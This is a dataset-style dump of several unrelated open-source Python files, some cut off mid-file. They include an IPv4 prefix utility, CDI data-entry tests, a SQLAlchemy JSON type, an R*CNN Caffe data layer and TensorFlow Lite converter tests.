hass, event_config, action, automation_info, platform_type="device"
)
def get_button_device_by_dr_id(hass: HomeAssistant, device_id: str):
"""Get a lutron device for the given device id."""
if DOMAIN not in hass.data:
return None
for config_entry in hass.data[DOMAIN]:
button_devices = hass.data[DOMAIN][config_entry][BUTTON_DEVICES]
device = button_devices.get(device_id)
if device:
return device
return None
|
jhanley634/testing-tools
|
problem/weblog/prefix/ip_addr.py
|
Python
|
mit
| 5,425
| 0.00129
|
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
from functools import lru_cache, total_ordering
import re
@total_ordering
class IpAddr:
"""Models an IPv4 32-bit address."""
dotted_quad_re = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
def __init__(self, dotted_quad):
if isinstance(dotted_quad, IpAddr):
dotted_quad = dotted_quad.decimal()
m = self.dotted_quad_re.search(dotted_quad)
assert m, dotted_quad # Input must be a valid decimal IPv4 address.
four_bytes = map(int, dotted_quad.split("."))
self.addr = self._combine(four_bytes)
@staticmethod
def _combine(nums):
acc = 0
for num in nums:
assert 0 <= num < 0x100, num
acc *= 0x100
acc += num
return acc
def _get_addr_bytes(self):
a = self.addr
bytes = []
for _ in range(4):
bytes.append(a & 0xFF)
a //= 0x100
return reversed(bytes)
def __str__(self):
return f"{self.addr:08x}"
def hex(self):
return self.__str__()
def decimal(self):
return ".".join(map(str, self._get_addr_bytes()))
def decimal03(self):
"""Returns e.g. 001.002.003.004. Lexical and numeric collations match."""
return ".".join([f"{b:03d}"
for b in self._get_addr_bytes()])
# from https://docs.python.org/3/library/functools.html#functools.total_ordering
@staticmethod
def _is_valid_operand(other):
return (hasattr(other, "addr")
and isinstance(other.addr, int)
and other.addr >= 0)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
return None # We can keep going.
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or self.addr == other.addr
def __lt__(self, other):
return self._invalid(other) or self.addr < other.addr
@total_ordering
class Prefix:
"""Models an IPv4 CIDR prefix: 32-bit address + mask."""
def __init__(self, ip: IpAddr, masklen=None):
if isinstance(ip, str) and "/" in ip:
ip, masklen = ip.split("/")
self.masklen = int(masklen)
assert 0 <= self.masklen <= 32, masklen
self.ip = IpAddr(ip)
self.ip.addr &= self.mask() # Canonicalize. Host part must be all zero.
def __str__(self):
return self.ip.decimal() + f"/{self.masklen}"
@staticmethod
@lru_cache()
def _mask(masklen: int):
# net_bits = masklen # network part, e.g. 24 in a class C
# host_bits = 32 - net_bits # host part, e.g. 8 in a class C
net_mask = 0
bit_val = 2 ** 32 # Start with MSB.
for _ in range(masklen):
bit_val //= 2 # Right shift one position.
net_mask |= bit_val
return net_mask
def mask(self):
return self._mask(self.masklen)
def __contains__(self, item: IpAddr):
a1 = self.ip.addr & self.mask()
a2 = item.addr & self.mask()
return a1 == a2
@staticmethod
def _is_valid_operand(other): # Other is a prefix that has an IP, and a mask.
return (hasattr(other, 'ip')
and IpAddr._is_valid_operand(other.ip)
and hasattr(other, 'masklen')
and 0 <= other.masklen <= 32)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
|
return None # We can keep going.
|
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) == (other.ip.addr, other.masklen)
def __lt__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) < (other.ip.addr, other.masklen)
def log_dist(a: IpAddr, b: IpAddr):
"""Finds the distance beween IPs, according to a logarithmic distance metric."""
prefix = Prefix(b, 32)
while (prefix.masklen > 0
and a not in prefix):
assert b in prefix, (b, prefix)
prefix.masklen -= 1
assert b in prefix, (b, prefix)
assert a in prefix, (a, prefix)
assert 0 <= prefix.masklen <= 32
log_distance = 32 - prefix.masklen
return log_distance
|
Samnsparky/cdibase
|
prog_code/controller/enter_data_controllers_test.py
|
Python
|
gpl-3.0
| 28,902
| 0.001799
|
"""Automated tests for entering CDI forms manually.
Copyright (C) 2014 A. Samuel Pottinger ("Sam Pottinger", gleap.org)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# Do not type check in tests
# type: ignore
import collections
import copy
import datetime
import json
import unittest
import unittest.mock
import cdibase
from ..struct import models
from ..util import constants
from ..util import db_util
from ..util import filter_util
from ..util import math_util
from ..util import recalc_util
from ..util import user_util
TEST_EMAIL = 'test.email@example.com'
TEST_DB_ID = '1'
TEST_USER = models.User(
TEST_DB_ID,
TEST_EMAIL,
None,
True,
False,
False,
False,
False,
False,
False,
False
)
MALE_TEST_PERCENTILE_NAME = 'male_test_percentiles'
FEMALE_TEST_PERCENTILE_NAME = 'female_test_percentiles'
OTHER_TEST_PERCENTILE_NAME = 'other_test_percentiles'
TEST_CDI_FORMAT_NAME = 'standard'
TEST_FORMAT = models.CDIFormat(
'standard',
'standard',
'standard.yaml',
{
'categories': [
{
'words':['cat_1_word_1', 'cat_1_word_2', 'cat_1_word_3'],
'language': 'english'
},
{
'words':['cat_2_word_1', 'cat_2_word_2', 'cat_2_word_3'],
'language': 'english'
}
],
'percentiles': {
'male': MALE_TEST_PERCENTILE_NAME,
'female': FEMALE_TEST_PERCENTILE_NAME,
'other': OTHER_TEST_PERCENTILE_NAME
},
'options': [
{'name': 'said', 'value': 1},
{'name': 'not said', 'value': 0}
],
'count_as_spoken': [1],
'meta': {'cdi_type': 'standard'}
}
)
TEST_STUDY_ID = '456'
TEST_STUDY_ID_2 = '789'
TEST_SNAPSHOT_ID = 789
TEST_ITEMS_EXCLUDED = 3
TEST_EXTRA_CATEGORIES = 4
TEST_SESSION_NUM = 4
TEST_LANGUAGES = ['english']
TEST_NUM_LANGUAGES = 1
TEST_HARD_OF_HEARING = False
TEST_STUDY = 'test study'
TEST_STUDY_2 = 'test study 2'
TEST_BIRTHDAY = '2011/09/12'
TEST_BIRTHDAY_DATE = datetime.date(2011, 9, 12)
TEST_SESSION = '2013/09/12'
TEST_TOTAL_NUM_SESSIONS = 48
TEST_AGE = 21
TEST_PERCENTILE = 50
TEST_PERCENTILE_MODEL_CLS = collections.namedtuple(
'TestPercentileModel',
['details']
)
TEST_PERCENTILE_MODEL = TEST_PERCENTILE_MODEL_CLS('test details')
TEST_SUCCESSFUL_PARAMS = {
'global_id': TEST_DB_ID,
'study_id': TEST_STUDY_ID,
'study': TEST_STUDY,
'gender': constants.MALE,
'age': TEST_AGE,
'birthday': TEST_BIRTHDAY,
'session_date': TEST_SESSION,
'session_num': TEST_SESSION_NUM,
'items_excluded': TEST_ITEMS_EXCLUDED,
'extra_categories': TEST_EXTRA_CATEGORIES,
'total_num_sessions': TEST_TOTAL_NUM_SESSIONS,
'hard_of_hearing': 'off',
'cat_1_word_1_report': '1',
'cat_1_word_2_report': '0',
'cat_1_word_3_report': '1',
'cat_2_word_1_report': '0',
'cat_2_word_2_report': '1',
'cat_2_word_3_report': '0'
}
TEST_EXPECTED_SNAPSHOT = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID,
TEST_STUDY,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SESSION_NUM,
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_SNAPSHOT_2 = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID_2,
TEST_STUDY_2,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SE
|
SSION_NUM,
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_WORD_ENTRIES = {
|
'cat_1_word_1': 1,
'cat_1_word_2': 0,
'cat_1_word_3': 1,
'cat_2_word_1': 0,
'cat_2_word_2': 1,
'cat_2_word_3': 0
}
class EnterDataControllersTests(unittest.TestCase):
def setUp(self):
self.app = cdibase.app
self.app.debug = True
self.__callback_called = False
def __run_with_mocks(self, on_start, body, on_end):
with unittest.mock.patch('prog_code.util.user_util.get_user') as mock_get_user:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model') as mock_load_cdi_model:
with unittest.mock.patch('prog_code.util.db_util.insert_snapshot') as mock_insert_snapshot:
with unittest.mock.patch('prog_code.util.db_util.report_usage') as mock_report_usage:
with unittest.mock.patch('prog_code.util.db_util.load_percentile_model') as mock_load_percentile_model:
with unittest.mock.patch('prog_code.util.math_util.find_percentile') as mock_find_percentile:
with unittest.mock.patch('prog_code.util.filter_util.run_search_query') as mock_run_search_query:
with unittest.mock.patch('prog_code.util.db_util.lookup_global_participant_id') as mock_lookup_global_participant_id:
with unittest.mock.patch('prog_code.util.db_util.update_participant_metadata') as mock_update_participant_metadata:
with unittest.mock.patch('prog_code.util.recalc_util.recalculate_ages_and_percentiles') as mock_recalculate_ages_and_percentiles:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model_listing') as mock_load_cdi_model_listing:
mocks = {
'get_user': mock_get_user,
'load_cdi_model': mock_load_cdi_model,
'insert_snapshot': mock_insert_snapshot,
'report_usage': mock_report_usage,
'load_percentile_model': mock_load_percentile_model,
'find_percentile': mock_find_percentile,
'run_search_query': mock_run_search_query,
'lookup_global_participant_id': mock_lookup_global_participant_id,
'update_participant_metadata': mock_update_participant_metadata,
'recalculate_ages_and_percentiles': mock_recalculate_ages_and_percentiles,
'load_cdi_model_listing': mock_load_cdi_model_listing
}
on_start(mocks)
body()
on_end(mocks)
self.__callback_called = True
def __default_on_start(self, mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].return_value = TEST_FORMAT
def __default_on_end(self, mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_called_with(TEST_CDI_FORMAT_NAME)
def __run_with_default_mocks(self, body):
self.__run_with_mocks(
lamb
|
zxytim/pynojo
|
pynojo/model/_ext_type.py
|
Python
|
gpl-3.0
| 2,330
| 0.003863
|
# $File: _ext_type.py
# $Date: Wed Feb 22 15:04:06 2012 +0800
#
# Copyright (C) 2012 the pynojo development team <see AUTHORS file>
#
# Contributors to this file:
# Kai Jia <jia.kai66@gmail.com>
#
# This file is part of pynojo
#
# pynojo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pynojo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANT
|
ABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pynojo. If not, see <http://www.gnu.org/licenses/>.
#
"""Extra SQLAlchemy ORM types"""
__all__ = ['JSONEncodeDict']
import cjson
from sqlalchemy.types import TypeDecorator, String
from sqlalchemy.ext.mutable import Mutable
from pynojo.exc import PynojoRuntimeErro
|
r
class JSONEncodeDict(TypeDecorator):
"""Represents an mutable python *dict* as a json-encoded string."""
# pylint: disable=W0223
impl = String
def process_bind_param(self, value, dialect):
if value is not None:
value = cjson.encode(value)
if len(value) > self.length:
raise PynojoRuntimeError(_(
'{class_name}: encoded string too long',
class_name = self.__class__.__name__))
return value
def process_result_value(self, value, dialect):
if value is not None:
value = cjson.decode(value)
return value
class _JSONEncodeDictMutabilize(Mutable, dict):
@classmethod
def coerce(cls, key, value):
if not isinstance(value, _JSONEncodeDictMutabilize):
if isinstance(value, dict):
return _JSONEncodeDictMutabilize(value)
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
dict.__delitem__(self, key)
self.changed()
_JSONEncodeDictMutabilize.associate_with(JSONEncodeDict)
|
jlinn/pylastica
|
pylastica/query/matchall.py
|
Python
|
apache-2.0
| 180
| 0.005556
|
__author__ = 'Joe Linn'
from . import abstract
c
|
lass MatchAll(abstract.AbstractQuery):
def __init__(self):
|
super(MatchAll, self).__init__()
self._params = {}
|
gkioxari/RstarCNN
|
lib/attr_data_layer/layer.py
|
Python
|
bsd-2-clause
| 5,647
| 0.000708
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# R*CNN
# Written by Georgia Gkioxari, 2015.
# See LICENSE in the project root for license information.
# --------------------------------------------------------
"""The data layer used during training to train a R*CNN network.
AttributesDataLayer implements a Caffe Python layer.
"""
import caffe
from fast_rcnn.config import cfg
from attr_data_layer.minibatch import get_minibatch
import numpy as np
import yaml
from multiprocessing import Process, Queue
# import pdb
class AttributesDataLayer(caffe.Layer):
"""R*CNN data layer used during training for attributes."""
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def _get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch.
If cfg.TRAIN.USE_PREFETCH is True, then blobs will be computed in a
separate process and made available through self._blob_queue.
"""
if cfg.TRAIN.USE_PREFETCH:
return self._blob_queue.get()
else:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
return get_minibatch(minibatch_db, self._num_classes)
def set_roidb(self, roidb):
"""Set the roidb to be used by this layer during training."""
self._roidb = roidb
self._shuffle_roidb_inds()
if cfg.TRAIN.USE_PREFETCH:
self._blob_queue = Queue(10)
self._prefetch_process = BlobFetcher(self._blob_queue,
self._roidb,
self._num_classes)
self._prefetch_process.start()
# Terminate the child process when the parent exists
def cleanup():
print 'Terminating BlobFetcher'
self._prefetch_process.terminate()
self._prefetch_process.join()
import atexit
atexit.register(cleanup)
def setup(self, bottom, top):
"""Setup the RoIDataLayer."""
# parse the layer para
|
meter string, which must be valid YAML
layer_params = yaml.load(self.param_str_)
self._num_classes = layer_params['num_classes']
self._name_to_top_map = {
'data': 0,
'rois': 1,
'labels': 2}
# data blob: holds a batch of N images, each with 3 channels
# The height and width (100 x 100) are dummy values
top[0].reshape(1, 3, 100, 100)
# rois blob: holds R regions of interest, each is a 5-tuple
|
# (n, x1, y1, x2, y2) specifying an image batch index n and a
# rectangle (x1, y1, x2, y2)
top[1].reshape(1, 5)
# labels blob: holds labels for each attribute
top[2].reshape(1, self._num_classes)
def forward(self, bottom, top):
"""Get blobs and copy them into this layer's top blob vector."""
blobs = self._get_next_minibatch()
for blob_name, blob in blobs.iteritems():
top_ind = self._name_to_top_map[blob_name]
# Reshape net's input blobs
top[top_ind].reshape(*(blob.shape))
# Copy data into net's input blobs
top[top_ind].data[...] = blob.astype(np.float32, copy=False)
def backward(self, top, propagate_down, bottom):
"""This layer does not propagate gradients."""
pass
def reshape(self, bottom, top):
"""Reshaping happens during the call to forward."""
pass
class BlobFetcher(Process):
"""Experimental class for prefetching blobs in a separate process."""
def __init__(self, queue, roidb, num_classes):
super(BlobFetcher, self).__init__()
self._queue = queue
self._roidb = roidb
self._num_classes = num_classes
self._perm = None
self._cur = 0
self._shuffle_roidb_inds()
# fix the random seed for reproducibility
np.random.seed(cfg.RNG_SEED)
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
# TODO(rbg): remove duplicated code
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
# TODO(rbg): remove duplicated code
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def run(self):
print 'BlobFetcher started'
while True:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs = get_minibatch(minibatch_db, self._num_classes)
self._queue.put(blobs)
|
xodus7/tensorflow
|
tensorflow/contrib/lite/python/lite_test.py
|
Python
|
apache-2.0
| 45,063
| 0.003107
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.contrib.lite.python import lite
from tensorflow.contrib.lite.python import lite_constants
from tensorflow.contrib.lite.python.interpreter import Interpreter
from tensorflow.python import keras
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops.variables import global_variables_initializer as _global_variables_initializer
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training.training_util import write_graph
class FromConstructor(test_util.TensorFlowTestCase):
# Tests invalid constructors using a dummy value for the GraphDef.
def testInvalidConstructor(self):
message = ('If input_tensors and output_tensors are None, both '
'input_arrays_with_shape and output_arrays must be defined.')
# `output_arrays` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(
None, None, [], input_arrays_with_shape=[('input', [3, 9])])
self.assertEqual(message, str(error.exception))
# `input_arrays_with_shape` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(None, [], None, output_arrays=['output'])
self.assertEqual(message, str(error.exception))
# Tests valid constructors using a dummy value for the GraphDef.
def testValidConstructor(self):
converter = lite.TocoConverter(
None,
None,
None,
input_arrays_with_shape=[('input', [3, 9])],
output_arrays=['output'])
self.assertFalse(converter._has_valid_tensors())
self.assertEqual(converter.get_input_arrays(), ['input'])
with self.assertRaises(ValueError) as error:
converter._set_batch_size(1)
self.assertEqual(
'The batch size cannot be set for this model. Please use '
'input_shapes parameter.', str(error.exception))
converter = lite.TocoConverter(None, ['input_tensor'], ['output_tensor'])
self.assertTrue(converter._has_valid_tensors())
class FromSessionTest(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[
|
0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testQuantization(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quan
|
t_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {
'inputA': (0., 1.),
'inputB': (0., 1.)
} # mean, std_dev
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.),
input_details[0]['quantization']) # scale, zero_point
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.uint8, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((1., 0.),
input_details[1]['quantization']) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('output', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
def testQuantizationInvalid(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'Quantization input stats are not available for input tensors '
'\'inputB\'.', str(error.exception))
def testSizeNoneInvalid(self):
in_tensor = array_ops.placeholder(dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Test invalid shape. None after 1st dimension.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual('Provide an input shape for input array \'Placeholder\'.',
str(error.exception))
def testBatchSizeInvalid(self):
in_tensor = array_ops.placeholder(
shape=[1, None, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# T
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.